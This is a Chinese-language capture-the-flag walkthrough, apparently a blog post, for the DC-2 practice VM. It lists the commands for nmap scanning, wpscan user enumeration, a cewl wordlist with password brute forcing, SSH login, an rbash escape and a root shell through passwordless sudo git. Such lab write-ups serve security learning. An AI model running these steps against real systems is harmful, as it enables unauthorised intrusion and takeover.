netdiscover -r 192.168.182.0/24 查询ip,确定为143
nmap扫描: nmap -p- 192.168.182.143 端口扫描 ,发现80与7744(远程连接)开放
首先80起手,发现找不到,但注意url上显示的为dc-2而不是192.168.182.143:80,说明重定向了,所以需要本地解析,更改hosts文件 C:\Windows\System32\drivers\etc\hosts
添加内容,保存后就能登录上了
下拉找到flag1
根据提示内容使用cewl
cewl是一款爬虫工具,爬取指定url上的关键字并返回一个字典做为爆破使用
同时,插件看网站cms为WordPress,wpscan就是专门针对这个框架的
wpscan --url http://dc-2 --e t 扫描主题
wpscan --url http://dc-2 --e p 扫描插件
wpscan --url http://dc-2 --e u 枚举用户
这里扫描用户找到3个
使用cewl进行爬虫 cewl http://dc-2/ > passwd.txt 去url上爬取内容并保存再passwd.txt,可以cat看看是否爬到
wpscan --url http://dc-2 --passwords passwd.txt 暴力破解,根据字典爆破,成功出密码,去页面登录吧(dirsearch一下目录,能看到登录页面)
在page中找到flag2,用另一种方法进入,开始nmap扫描时还有一个7744端口开放,那就ssh喽
ssh tom@192.168.182.143 -p 7744
ssh jerry@192.168.182.143 -p 7744
都尝试,发现tom能连接上
展开找到flag4,注意是-rbash,其中一些命令好使,使用vi打开flag
可以使用echo $PATH 查看在rbash中哪些命令可以使用
可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。 其中说should su 使用su上jerry内账号看看
使用su,但找不到,所以需要rbash逃逸,为啥逃逸,不逃逸的话命令不好使啊,就像cat都不让用
BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
这些命令的含义就是配置一个环境变量,可以使用bin目录下的命令,这里可以看到su命令可以使用了
su jerry 进入jerry中,也可以返回home目录找到jerry再cd进入
flag4翻译就是:啥也没有,(但我理解其中你就是你自己,指的tom或jerry而不是root权限,GO on - git outta here,使用git提权)
提示了git,但先sudo -l看权限
这里看到root 无密码的状态下git可以
最后一步了,提权!!!
sudo git help config
!/bin/bash
提权方法可自行度娘
找到啦
进入到root权限中 vi /etc/sudoers 打开sudoers文件,里面记录了root权限赋予的一些命令
sudoers文件里面存储了sudo权限的相关配置
这句话是 jerry被赋予了root可以是用的git命令且不需要密码,所以使用git方式提权
扫一扫
400
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
